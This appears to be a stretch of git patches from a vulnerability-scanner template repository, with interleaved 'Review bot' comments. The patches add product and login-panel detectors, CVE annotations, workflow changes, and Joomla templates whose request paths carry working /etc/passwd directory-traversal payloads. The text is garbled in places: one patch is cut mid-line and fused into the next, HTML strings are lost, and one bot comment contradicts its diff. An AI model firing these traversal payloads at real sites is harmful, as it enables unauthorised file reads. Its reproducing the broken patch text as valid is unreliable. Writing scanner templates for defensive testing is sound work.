@@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From e4c3490a28f1b8674b57557b3ca6481456dddc86 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:33 +0530 Subject: [PATCH 142/339] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
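Review bot: `severity: high` disagrees with the new `cvss-score: 5.0` in the classification block, and the block carries no `cvss-metrics`, so the CVSS version the score belongs to cannot be told; the other templates in this series pair a 5.30 score with `severity: medium` and always give the vector. Either align the severity with the score or add the vector the score was derived from, `cvss-metrics: <CVSS vector>`, next to it.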
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 95e3f9a597..89bd02fd49 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -23,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master shell: bash - name: Template Validation From ec4a1cf38dd42e67262f3557caccf74b5eba2004 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:54:45 +0530 Subject: [PATCH 143/339] testing automation --- cves/2011/CVE-2011-2780.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index db72d7955c..d57a2e90e1 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -4,15 +4,7 @@ info: name: Chyrp 2.x - Local File Inclusion (LFI) author: daffainfo severity: high - description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/35946 - - https://www.cvedetails.com/cve/CVE-2011-2780 - tags: cve,cve2011,lfi - classification: - cvss-score: 5.0 - cve-id: CVE-2011-2780 - cwe-id: CWE-22 + tags: cve,cve2011,lfi,chyrp requests: - method: GET From 76c7234ca042afec00b592c59c6890be8b03501f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:11:34 +0530 Subject: [PATCH 144/339] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..9a81739780 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml 
@@ -43,3 +43,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} From ca9d4a136e5250999c790a14736d7d130a23282b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:30:36 +0530 Subject: [PATCH 145/339] dev update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 9a81739780..8e0fd3c94d 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 @@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From c41f64987b28967b298fe9d985f3b50f5f1f4a83 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 10 Sep 2021 17:18:15 -0300 Subject: [PATCH 146/339] Update wordpress-db-repair.yaml Solves this false positive (different encoding) nuclei -debug -t nuclei-templates/vulnerabilities/wordpress/wordpress-db-repair.yaml -u https://try.walmart.com <p><code>define('WP_ALLOW_REPAIR', true); --- vulnerabilities/wordpress/wordpress-db-repair.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-db-repair.yaml b/vulnerabilities/wordpress/wordpress-db-repair.yaml index c3c2709096..6cf8668d0b 100644 --- a/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -24,5 +24,8 @@ requests: - type: word words: - - "define('WP_ALLOW_REPAIR', true);" - negative: true \ No newline at end of file + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true 
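Review bot: In the wordpress-db-repair.yaml hunk, splitting the exact string into the words `define`, `WP_ALLOW_REPAIR` and `true` with `condition: and` and `negative: true` makes the matcher report whenever any one of the three is absent, and `define` and `true` occur in almost any HTML page, so the signal now rests on `WP_ALLOW_REPAIR` alone while a page that mentions that constant in a different context is still reported. A regex that tolerates the quote encoding keeps the original precision: replace the words matcher with `- type: regex`, `regex:` and `- "define\\((?:'|&#0?39;)WP_ALLOW_REPAIR(?:'|&#0?39;), true\\);"`, keeping `negative: true`. The `matchers:` list this entry belongs to begins outside the hunk.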
From 80702f0451172e42bc54e06b1a09ddcf08e852ea Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Sat, 11 Sep 2021 02:24:37 -0300 Subject: [PATCH 147/339] Create carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 technologies/carestream-vue-detect.yaml diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml new file mode 100644 index 0000000000..db87a0e67e --- /dev/null +++ b/technologies/carestream-vue-detect.yaml @@ -0,0 +1,27 @@ +id: carestream-vue-detect + +info: + name: CARESTREAM Vue Motion Detector + author: philippedelteil + severity: info + description: This template will detect a running CARESTREAM Vue Motion instance + references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + +requests: + - method: GET + path: + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + - "{{BaseURL}}/portal/favicon.ico" + redirects: true + stop-at-first-match: true + max-redirects: 2 + matchers: + - type: dsl + name: "MyVueHelp" + dsl: + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" From 5582e890a14ad1f392448b43ec7b890c30ca1cbb Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:16:55 +0530 Subject: [PATCH 148/339] pre-commit-config update --- .github/workflows/template-validate.yml | 4 ++-- .pre-commit-config.yaml => .pre-commit-config.yml | 0 .yamllint | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) rename .pre-commit-config.yaml => .pre-commit-config.yml (100%) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 89bd02fd49..e1e189c35b 100644 
--- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -28,6 +28,6 @@ jobs: - name: Template Validation run: | - nuclei -validate -t . -exclude .pre-commit-config.yaml - nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml + nuclei -validate -t . + nuclei -validate -w ./workflows shell: bash \ No newline at end of file diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yml similarity index 100% rename from .pre-commit-config.yaml rename to .pre-commit-config.yml diff --git a/.yamllint b/.yamllint index 681c2959c0..ddcf63b7b7 100644 --- a/.yamllint +++ b/.yamllint @@ -2,7 +2,7 @@ extends: default ignore: | - .pre-commit-config.yaml + .pre-commit-config.yml .github/workflows/*.yml rules: From c2e651272cb35a8e651ed60b692ac98097279e76 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:22:12 +0530 Subject: [PATCH 149/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index db87a0e67e..989eceab43 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml 
@@ -1,27 +1,30 @@ id: carestream-vue-detect info: - name: CARESTREAM Vue Motion Detector + name: CARESTREAM Vue Motion Detector author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + tags: tech,myvuehelp requests: - method: GET path: - - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" - "{{BaseURL}}/portal/favicon.ico" + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + redirects: true stop-at-first-match: true max-redirects: 2 + matchers-condition: or matchers: - type: dsl - name: "MyVueHelp" + name: "myvuehelp" dsl: - - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' - type: dsl - name: "favicon" + name: "myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" + - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file From 217840fe993f61e5bacefe89357fa26bde05061c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:27:48 +0530 Subject: [PATCH 150/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 989eceab43..5a7c50f69d 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml 
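Review bot: The second DSL expression, `'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))'`, has lost the opening double quote before the hash, so the comparison is unlikely to parse and the favicon matcher will fail to load. Restore it as `- 'status_code==200 && ("1c4b2c10acccc48852d12eddadaf7944" == md5(body))'`. The `name:` line is shown as changed with no visible difference, presumably a whitespace-only edit; the collapsed rendering hides which.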
@@ -5,7 +5,7 @@ info: author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance - references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + reference: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf tags: tech,myvuehelp requests: From 9aa0acb8d2e2c74971216c935ac76f7b28bd7966 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:34:40 +0530 Subject: [PATCH 151/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index 5a7c50f69d..b7ce069ac1 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -22,9 +22,9 @@ requests: - type: dsl name: "myvuehelp" dsl: - - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" - type: dsl name: "myvuehelp-favicon" dsl: - - 'status_code==200 && (1c4b2c10acccc48852d12eddadaf7944" == md5(body))' \ No newline at end of file + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file From a6d61cd622c3c280b46b46418d9c5edb124be33a Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 13:53:26 +0530 Subject: [PATCH 152/339] workflow update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..ecad02f49f 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml 
@@ -1,7 +1,7 @@ name: ✍🏻 CVE Annotate on: - pull_request: + push: branches: - master workflow_dispatch: From 6bd323aae1d3d23932be739745f751e6921f248c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 11 Sep 2021 08:45:52 +0000 Subject: [PATCH 153/339] Auto Generated CVE annotations [Sat Sep 11 08:45:52 UTC 2021] :robot: --- cves/2011/CVE-2011-2780.yaml | 12 ++++++++++++ cves/2015/CVE-2015-7450.yaml | 5 +++++ 2 files changed, 17 insertions(+) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index d57a2e90e1..1cb0a0ac54 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,18 @@ info: author: daffainfo severity: high tags: cve,cve2011,lfi,chyrp + description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." + reference: + - http://www.justanotherhacker.com/advisories/JAHx113.txt + - http://www.openwall.com/lists/oss-security/2011/07/13/5 + - http://www.ocert.org/advisories/ocert-2011-001.html + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://www.securityfocus.com/bid/48672 + - http://secunia.com/advisories/45184 + - http://osvdb.org/73891 + - http://securityreason.com/securityalert/8312 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 + - http://www.securityfocus.com/archive/1/518890/100/0/threaded requests: - method: GET diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index e27a3e815f..04918de4f0 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml 
@@ -10,6 +10,11 @@ info: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 tags: cve,cve2015,websphere,deserialization,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2015-7450 + cwe-id: CWE-94 requests: - raw: From 8cbd12af606195512be5a646c9e422795d05165e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 11 Sep 2021 20:50:49 +0530 Subject: [PATCH 154/339] Add files via upload --- technologies/oracle-dbcs.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/oracle-dbcs.yaml diff --git a/technologies/oracle-dbcs.yaml b/technologies/oracle-dbcs.yaml new file mode 100644 index 0000000000..d1c8891335 --- /dev/null +++ b/technologies/oracle-dbcs.yaml @@ -0,0 +1,19 @@ +id: oracle-database-service +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - '<title>Oracle Database as a Service' + - type: status + status: + - 200 \ No newline at end of file From 207c140c504264803a0a4d2fd8776bc289e25508 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 11 Sep 2021 21:06:36 +0530 Subject: [PATCH 155/339] moving files around --- .../other/karel-ip-phone-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename karel-ip-phone-lfi.yaml => vulnerabilities/other/karel-ip-phone-lfi.yaml (100%) diff --git a/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml similarity index 100% rename from karel-ip-phone-lfi.yaml rename to vulnerabilities/other/karel-ip-phone-lfi.yaml 
From acbe5973922109a2506b91ca8b31eb0519b55c2f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 11 Sep 2021 21:11:23 +0530 Subject: [PATCH 156/339] Add files via upload --- technologies/oracle-dbass-detect.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 technologies/oracle-dbass-detect.yaml diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle-dbass-detect.yaml new file mode 100644 index 0000000000..2c6406bb5d --- /dev/null +++ b/technologies/oracle-dbass-detect.yaml @@ -0,0 +1,18 @@ +id: oracle-DBaaS Monitor-service +info: + name: DBaaS Monitor Detect + author: pussycat0x + severity: info + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}/dbaas_monitor/login' + matchers-condition: and + matchers: + - type: word + words: + - 'DBaaS Monitor' + - type: status + status: + - 200 \ No newline at end of file From 50e9ff0839d5f6d5401074c1d05f29915ccdad67 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:12:06 +0530 Subject: [PATCH 157/339] Create oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 24 +++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-business-control.yaml diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml new file mode 100644 index 0000000000..04d90cc407 --- /dev/null +++ b/exposed-panels/oracle-business-control.yaml @@ -0,0 +1,24 @@ +id: oracle-business-control + +info: + name: Oracle Commerce Business Control Center + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 + +requests: + - method: GET + path: + - '{{BaseURL}}/atg/bcc' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Commerce Business Control Center' + + - type: status + status: + - 200 
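Review bot: In oracle-dbass-detect.yaml, `id: oracle-DBaaS Monitor-service` contains a space and mixed case; ids elsewhere in this repository are lowercase kebab-case, and a space is likely to fail the id check run by `nuclei -validate` in template-validate.yml. Use `id: oracle-dbaas-monitor-detect`, and consider naming the file to match (the `dbass` in the filename looks like a typo for `dbaas`). The oracle-dbcs.yaml hunk in the previous commit has the same id/filename mismatch (`id: oracle-database-service`).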
From eec52d721480f8be50037d7160185e58a4a10d11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:20:57 +0530 Subject: [PATCH 158/339] Create oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/oracle-integrated-manager.yaml diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml new file mode 100644 index 0000000000..8a61b0ea64 --- /dev/null +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -0,0 +1,24 @@ +id: oracle-integrated-manager + +info: + name: Oracle(R) Integrated Lights Out Manager + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + +requests: + - method: GET + path: + - '{{BaseURL}}/iPages/i_login.asp' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle(R) Integrated Lights Out Manager - Login' + + - type: status + status: + - 200 From 1f40ec24c5bc6ff1e61494fdb1d9891f15e30e8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 11 Sep 2021 21:50:06 +0530 Subject: [PATCH 159/339] Create oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/oracle-people-enterprise.yaml diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml new file mode 100644 index 0000000000..eba64c8a2a --- /dev/null +++ b/exposed-panels/oracle-people-enterprise.yaml 
@@ -0,0 +1,26 @@ +id: oracle-people-enterprise + +info: + name: Oracle Peoplesoft Enterprise + author: dhiyaneshDk + severity: info + tags: oracle,login + reference: + - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "/signon.html" + - " Date: Sun, 12 Sep 2021 05:10:08 +0700 Subject: [PATCH 161/339] Create CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2037.yaml diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml new file mode 100644 index 0000000000..9a9b24c3e6 --- /dev/null +++ b/cves/2010/CVE-2010-2037.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2037 + +info: + name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34005 + - https://www.cvedetails.com/cve/CVE-2010-2037 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 81ea9540f2e645250a5e4ee9e31e395391eeb326 Mon Sep 17 00:00:00 2001 
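Review bot: The traversal in `path` ends in `%00` and therefore depends on null-byte truncation of whatever the component appends to `controller`, which PHP stopped honouring in 5.3.4; on a host running a newer PHP with the vulnerable component still installed, the include fails, `root:.*:0:0` never matches and the template reports the target as clean. Record that limitation in the template, e.g. `description: ... Detection relies on null-byte truncation and so only confirms hosts running PHP < 5.3.4.`, so a negative result is not read as "not vulnerable". The regex matcher has no `part:` and falls back to the body, which is the intended behaviour here.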
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 12 Sep 2021 06:18:29 +0700 Subject: [PATCH 162/339] Create CVE-2010-1723.yaml --- cves/2010/CVE-2010-1723.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1723.yaml diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml new file mode 100644 index 0000000000..4b5060444b --- /dev/null +++ b/cves/2010/CVE-2010-1723.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f0a500cf976af1720f0d79d071ad12a325a9919d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 11 Sep 2021 22:14:16 -0300 Subject: [PATCH 163/339] Create symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/symantec-ewep.yaml diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep.yaml new file mode 100644 index 0000000000..6891d66808 --- /dev/null +++ b/exposed-panels/symantec-ewep.yaml 
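Review bot: As with the sibling CVE-2010-2037 template, the `controller=../../../../../../../../../../etc/passwd%00` payload only works where PHP still truncates paths at a null byte (before 5.3.4), so a patched PHP hides a still-vulnerable com_drawroot install from this check. Add a sentence to the description such as `Detection depends on null-byte truncation and therefore requires PHP < 5.3.4.`, and consider a comment above `path` saying the same so the next maintainer does not "fix" the `%00` away.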
@@ -0,0 +1,22 @@ +id: symantec-ewep + +info: + name: Detect Symantec Encryption Web Email Protection + author: johnk3r + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/b/l.e" + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Corporation. All Rights Reserved" + part: body + - type: status + status: + - 200 From 896343be128678e07d0c2166d7444d906a0f4f55 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:41:33 +0300 Subject: [PATCH 164/339] Clarify description --- vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index 5f888337fc..f359c42b11 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -3,7 +3,7 @@ id: oscommerce-rce info: author: Suman_Kar name: osCommerce 2.3.4.1 - Remote Code Execution - description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php + description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the command's executed output reference: https://www.exploit-db.com/exploits/50128 severity: high tags: rce,oscommerce From 624162cca79ad4aa06f205869262c44e9633c30a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:50:53 +0300 Subject: [PATCH 165/339] Working reference --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index c0918d72c5..958241da6b 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml 
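Review bot: The body matcher `Symantec Corporation. All Rights Reserved` is a generic copyright footer shared by many Symantec products and by any page that mirrors it, so `/b/l.e` answering 200 with that string does not identify Web Email Protection specifically and the template will produce false positives on other Symantec appliances. Match a product-specific string instead, for example the login page title `- "Symantec Encryption Server: Web Email Protection - Login"`, and keep the `status: 200` matcher as the secondary condition.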
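Review bot: The rewritten `description` line in oscommerce-rce.yaml has two grammatical slips: `allows remote unauthenticated attackers to injecting PHP code` should read `to inject PHP code`, and `to to read the command's executed output` doubles the `to`. Suggested line: `description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to inject PHP code into the db_database parameter and subsequently use the configure.php page to read the output of the executed command.`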
+++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://www.securityfocus.com/bid/54326/info + reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 tags: wordpress,xss,wp-plugin requests: From fb2f89bc867e272a0eb77331ef73c891ae1969d0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:43 +0300 Subject: [PATCH 166/339] References --- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 7075c485bf..dfb6f028d4 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,6 +5,9 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 requests: - raw: From e602575ae0cc3fd849742cdf401f709050d3e616 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 12:58:48 +0300 Subject: [PATCH 167/339] Working reference --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index f5c5957b97..089b607075 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml 
